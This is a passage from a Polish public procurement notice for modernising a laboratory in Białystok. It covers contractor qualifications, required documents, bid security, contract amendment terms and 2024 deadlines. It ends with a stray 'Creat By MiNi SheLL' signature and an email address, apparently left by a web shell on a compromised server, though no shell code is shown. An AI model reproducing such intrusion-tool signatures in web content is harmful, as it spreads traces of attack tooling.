wykazu-załącznik nr 8 do SWZ).<br/>Ocena spełniania warunku dokonywana będzie w oparciu o oświadczenie, wykaz robót + dowody wykonania usług złożone<br/>przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.<br/>oraz<br/>dysponuje lub będzie dysponować w trakcie realizacji zamówienia min. następującymi osobami skierowanymi do wykonania<br/>zamówienia, umożliwiającymi wykonanie zamówienia na odpowiednim poziomie jakości, tj.:<br/>Kierownik budowy, kierownicy robót<br/>• osobą, którą Wykonawca zamierza skierować do realizacji niniejszego zamówienia w funkcji kierownika budowy,<br/>posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi bez<br/>ograniczeń (zgodnie z art. 14 ust. 1 pkt 2 i ust. 3 pkt 3 ustawy z dnia 7 lipca 1994 r. Prawo budowlane). Wykonawca<br/>przedstawi wykaz osób skierowanych do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami<br/>budowalnymi bez ograniczeń wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami; (wzór wykazu-załącznik nr 9 do SWZ).<br/>• Osobą/osobami, którą Wykonawca zamierza skierować do realizacji niniejszego zamówienia w funkcji kierownika robót<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych oraz elektrycznych i elektroenergetycznych posiadającą uprawnienia budowlane do kierowania robotami w<br/>ww. specjalności bez ograniczeń (zgodnie z art. 14 ust. 1 pkt 4 lit. b oraz ust. 3 pkt 3 ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane). Wykonawca przedstawi wykaz osób skierowanych do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych oraz elektrycznych i elektroenergetycznych posiadającą uprawnienia budowlane do<br/>kierowania robotami w ww. specjalności bez ograniczeń wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; (wzór wykazu-załącznik nr<br/>9 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">• oświadczenia o którym<br/>mowa w art. 125 ust. 1 PZP - o spełnianiu warunków udziału w postępowaniu, niepodleganiu wykluczeniu [w zakresie braku podstaw<br/>do wykluczenia z postępowania]. Wzór oświadczenia zawarto w zał. nr 4 do SWZ. Oświadczenie należy złożyć wraz z ofertą.<br/>• oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. w Dz. U. z 2023 r. poz. 1689, 1705), z innym<br/>wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 7 do SWZ; Dokument składany na wezwanie.<br/>• Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP. w zakresie<br/>odnoszącym się do podstaw wykluczenia - wzór oświadczenia stanowi Załącznik nr 10 do SWZ. Dokument składany na wezwanie.<br/>• odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji; Dokument składany na wezwanie.<br/>• Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;<br/>• Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający,<br/>że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo<br/>przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne<br/>wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W<br/>zakresie:<br/>sytuacji ekonomicznej lub finansowej – Zamawiający wyznacza szczegółowe warunki w tym zakresie i uzna, że Wykonawca spełnia<br/>warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór-zał. nr 4 do SWZ) oraz dostarczy<br/>dokument(y) potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 mln zł (jeden milion złotych). Jeżeli z uzasadnionej<br/>przyczyny Wykonawca nie może złożyć wymaganego przez Zamawiającego dokumentu Zamawiający dopuszcza złożenie przez<br/>Wykonawcę innego dokumentu, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku<br/>udziału w postępowaniu. Ocena spełniania warunku dokonywana będzie w oparciu o oświadczenie, dokument potwierdzający<br/>ubezpieczenie od oc złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.<br/>zdolności technicznej lub zawodowej Zamawiający wyznacza szczegółowe warunki w tym zakresie i uzna, że Wykonawca spełnia<br/>warunek jeżeli:<br/>złoży oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór-zał. nr 4 do SWZ) oraz wykaże co najmniej 2 roboty tzn.<br/>budowa, modernizacja, przebudowa, rozbudowa, remont w zakresie: budynku użyteczności publicznej/obiektu<br/>badawczego/laboratorium/obiektu medycznego, o wartości min. 500 tys. zł brutto każda lub jedną o wartości 1 mln zł brutto,<br/>wykonane, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, dat i miejsc wykonania i podmiotów, na rzecz których roboty<br/>zostały wykonane oraz załączeniem dowodów określających, czy te roboty zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wzór<br/>wykazu-załącznik nr 8 do SWZ).<br/>Ocena spełniania warunku dokonywana będzie w oparciu o oświadczenie, wykaz robót + dowody wykonania usług złożone przez<br/>wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.<br/>oraz<br/>dysponuje lub będzie dysponować w trakcie realizacji zamówienia min. następującymi osobami skierowanymi do wykonania<br/>zamówienia, umożliwiającymi wykonanie zamówienia na odpowiednim poziomie jakości, tj.:<br/>Kierownik budowy, kierownicy robót<br/>• Wykonawca przedstawi wykaz osób skierowanych do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami<br/>budowalnymi bez ograniczeń wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami; (wzór wykazu-załącznik nr 9 do SWZ).<br/>• Wykonawca przedstawi wykaz osób skierowanych do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych oraz elektrycznych i elektroenergetycznych posiadającą uprawnienia budowlane do kierowania robotami w ww.<br/>specjalności bez ograniczeń wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami; (wzór wykazu-załącznik nr 9 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> WYMAGANIA DOTYCZĄCE WADIUM. <br/>1.	Przystępując do procedury przetargowej Wykonawca jest obowiązany w terminie do dnia: 20 września 2024 r. do godz. 12.00 wnieść wadium na cały wymagany okres związania ofertą, w kwocie: 5 000,00 PLN (słownie: pięć tysięcy złotych 00/100)<br/>2.	Wykonawca zobowiązany jest wnieść wadium w jednej lub kilku nw. formach: <br/>2.1. pieniądzu – (w walucie złoty polski), <br/>2.2. gwarancjach bankowych, <br/>2.3. gwarancjach ubezpieczeniowych, <br/>2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2023 r. poz. 462, 1672).<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>3.	Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy Zamawiającego zostanie uznany kwotą wadium przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert). <br/>4.	Wadium wniesione w pieniądzu Wykonawca zobowiązany jest wpłacić przelewem na rachunek bankowy w BNP Parisbas Polska Oddział w Poznaniu nr: 63 2030 0045 1110 0000 0042 1600 z dopiskiem „WADIUM – Przetarg IORPIB/ZP/RB/Mod.Lab./Białystok/2024” <br/>5.	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, gwarancja lub poręczenie powinno być sporządzone zgodnie z obowiązującym prawem i winno zawierać następujące elementy: <br/>5.1. Nazwę dającego zlecenie - Wykonawcy (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – zaleca się wymienienie wszystkich Wykonawców), beneficjenta gwarancji lub poręczenia - Zamawiającego, gwaranta lub poręczyciela - banku lub instytucji ubezpieczeniowej udzielających gwarancji lub poręczenia oraz wskazanie ich siedzib, <br/>5.2. Określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem, <br/>5.3. Kwotę gwarancji lub poręczenia, <br/>5.4. Termin ważności gwarancji lub poręczenia (który nie może być krótszy niż termin związania Wykonawcy złożoną przez niego ofertą), <br/>5.5. Zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia. Z treści gwarancji/poręczenia musi jednoznacznie wynikać bezwarunkowe, nieodwołalne i na każde żądanie Zamawiającego (beneficjenta) zobowiązanie Gwaranta do zapłaty na rzecz Zamawiającego pełnej kwoty wadium w okolicznościach skutkujących zatrzymaniem wadium, określonych w art. 98 ust. 6 ustawy oraz oznaczenie postępowania, którego wadium dotyczy. Ponadto powinien być wskazany termin obowiązywania gwarancji (poręczenia), który nie może być krótszy niż termin związania ofertą. <br/>6.	W przypadku wnoszenia wadium w formie innej niż pieniądz, wymagane jest załączenie do oferty oryginalnego dokumentu gwarancji/poręczenia w formie elektronicznej z zastrzeżeniem, że dokument będzie podpisany kwalifikowanym podpisem elektronicznym przez Gwaranta tj. wystawcę gwarancji poręczenia.<br/>7.	Wykonawca wnoszący wadium w pieniądzu zobowiązany jest podać w ofercie numer konta, na które miałoby zostać zwrócone wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszonymi o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy. <br/>8.	W przypadku wniesienia wadium w pieniądzu, Wykonawca załącza do oferty dokument potwierdzający wniesienie przedmiotowego wadium. <br/>9.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>10.	Zasady zwrotu wadium oraz jego przepadku określa art. 98 ustawy PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>3. Warunek dotyczący zdolności technicznej lub zawodowej Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą spełnić jeżeli łącznie wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dysponują lub będą<br/>dysponować w trakcie realizacji zamówienia wszystkimi osobami, o których mowa w opisie tego warunku. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany Umowy :<br/>2.1. W przypadku dokonania poniższych czynności lub ich zaniechania przez organy administracji państwowej,<br/>samorządowej jak i organy lub podmioty, których działalności wymaga wydania jakichkolwiek decyzji, warunków, zezwoleń,<br/>uzgodnień, pozwoleń, itp., w trakcie wykonywania przedmiotu Umowy, a w szczególności:<br/>1) opóźnienia wydania, odmowy lub zmiany wydania w/w dokumentów, do których wydania są zobowiązane na mocy<br/>przepisów prawa lub regulaminów,<br/>2) wydania w/w dokumentów, w których nakazano dopuszczalny czas prowadzenia Robót uniemożliwiający dotrzymania<br/>Czasu na Wykonanie,<br/>2.2. Pozostałe Zmiany spowodowane następującymi okolicznościami:<br/>1) kolizją z inwestycjami planowanymi lub równolegle prowadzonymi przez Zamawiającego lub inne podmioty, w takim<br/>przypadku Zmianie może ulec:<br/>a) sposób wykonania, Materiały / Urządzenia, technologie wykonania lub lokalizacja części przedmiotu Umowy w zakresie<br/>niezbędnym do usunięcia kolizji,<br/>b) Czas na Wykonanie, odpowiednio do okresu trwania przeszkody, która uniemożliwia realizacje części przedmiotu<br/>Umowy,<br/>c) Cena Umowy, na pokrycie dodatkowych uzasadnionych i udokumentowanych kosztów pozostających w bezpośrednim<br/>związku z działaniami podjętymi w celu usunięcia kolizji.<br/>2) gdy zaistnieje siła wyższa lub inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna,<br/>ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości<br/>należytego wykonania umowy zgodnie z SWZ lub wprowadzenie tych zmian jest korzystne dla Zamawiającego,<br/>3) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu<br/>umowy lub świadczenia jednej lub obu Stron,<br/>4) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie będzie można usunąć w inny<br/>sposób, a zmiana będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie<br/>2.3. W przypadku zmiany stawki podatku od towarów i usług, zmianie może ulec cena umowy. Zmiana będzie odnosić się<br/>wyłącznie do części przedmiotu Umowy realizowanej, po dniu wejścia w życie przepisów zmieniających stawkę podatku od<br/>towarów i usług oraz wyłącznie o ile ich powstanie nie jest lub nie było zależne od Wykonawcy, zmianie może ulec Czas na<br/>Wykonanie, odpowiednio do okresu trwania przeszkody, o której mowa powyżej.<br/>1) jeżeli nastąpi zmiana stawki podatku od towarów i usług (VAT) lub podatku akcyzowego, która będzie powodować<br/>zmianę kosztów wykonania po stronie Wykonawcy. Zmiana wynagrodzenia będzie dotyczyła wynagrodzenia za część robót<br/>wykonywanych po dacie wejścia w życie przepisów stanowiących o zmianie stawki VAT lub podatku akcyzowego, przy<br/>czym podwyższenie wynagrodzenia Wykonawcy o zmianę stawki podatku VAT lub akcyzowego nie dotyczy sytuacji, gdy<br/>zwłoka Wykonawcy w wykonaniu przedmiotu umowy spowodowała konieczność jego realizacji w okresie obowiązywania<br/>wyższej stawki podatku VAT lub podatku akcyzowego,<br/>2) w przypadku wyłączenia części robót objętych umową na wniosek Zamawiającego,<br/>3) w przypadku zmiany minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na<br/>podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, w przypadku zmiany zasad<br/>podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia<br/>społeczne lub ubezpieczenie zdrowotne,<br/>4) w przypadku zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w<br/>ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (t.j. Dz. U. z 2024 r. poz. 427),<br/>5) wystąpi konieczność wykonania zamówienia dodatkowego,<br/>cd w Zał. nr 5 do SWZ-Projektowane postanownienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">na Platformie e-zamówienia: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bd2a0711-5154-4007-9afd-b45fa9268735</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-20 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com